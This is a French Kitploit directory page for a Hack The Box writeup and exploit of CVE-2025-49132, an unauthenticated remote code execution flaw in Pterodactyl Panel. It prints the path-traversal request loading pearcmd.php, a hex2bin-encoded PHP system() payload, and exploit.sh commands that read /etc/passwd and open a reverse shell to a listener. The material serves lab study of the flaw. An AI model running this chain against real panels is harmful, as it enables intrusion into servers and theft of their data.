Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49132_HTB_SEASON10 — Exploit RCE non authentifié pour CVE-2025-49132 dans Pterodactyl Panel via traversée de chemin, injection de commande PEAR et exécution de code PHP. Inclut un writeup HTB et un script d'assistance. | Kitploit
Outils/GitHubGitHub/ahmedf000/cve-2025-49132_htb_season10
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubahmedf000/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

Exploit RCE non authentifié pour CVE-2025-49132 dans Pterodactyl Panel via traversée de chemin, injection de commande PEAR et exécution de code PHP. Inclut un writeup HTB et un script d'assistance.

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49132 - Exploit RCE du Panneau Pterodactyl

HTB Saison 10 - Writeup de la Machine Pterodactyl

Aperçu

Cible : Machine HTB Pterodactyl (Difficulté Moyenne)
CVE : CVE-2025-49132
Sévérité : Critique (CVSS 9.8)
Type d'attaque : Exécution de code à distance non authentifiée
Affecté : Panneau Pterodactyl < v1.11.11

Cette chaîne d'exploitation combine :

  1. Path Traversal dans le système de traduction des locales
  2. Injection de commandes PEAR via pearcmd.php
  3. Exécution de code PHP par écriture de fichier + inclusion

Le Bug

Le point d'accès /locales/locale.json du panneau Pterodactyl permet un path traversal via le paramètre locale :

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

Cela peut être enchaîné avec pearcmd.php de PEAR pour :

  1. Écrire des fichiers PHP arbitraires dans /tmp
  2. Les exécuter via une autre requête

Pourquoi ça fonctionne

PEAR (PHP Extension and Application Repository) possède un outil CLI (pearcmd.php) qui :

  • Accepte des commandes via des paramètres d'URL (prévu uniquement pour la CLI)
  • Dispose d'une commande config-create qui écrit des fichiers
  • N'a AUCUNE authentification lorsqu'il est appelé via le web

La chaîne d'exploitation :

root@kitploit:~
Path Traversal → Charger pearcmd.php → Injecter du PHP via config-create → Exécuter le PHP malveillant

L'astuce hex2bin()

Les commandes sont encodées en hexadécimal à l'aide de hex2bin() pour contourner :

  • Les problèmes d'encodage d'URL
  • Les filtres de caractères spéciaux
  • Les problèmes d'analyse Nginx/PHP

Exemple :

root@kitploit:~
Commande : whoami
Hex :     77686f616d69
Payload : <?=system(hex2bin('77686f616d69'))?>

Exécution de code à distance

Méthode : Utilisation du script exploit.sh fourni

root@kitploit:~
chmod +x exploit.sh

# Obtenir le flag utilisateur
./exploit.sh flag

# Exécuter des commandes
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Shell inverse
nc -lvnp 4444  # Sur la machine attaquante
./exploit.sh shell 10.10.14.21 4444

Références

CVE & Exploits

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

Ressources techniques

  • Documentation du panneau Pterodactyl
  • Documentation PEAR
  • OWASP Path Traversal

Télécharger l’outil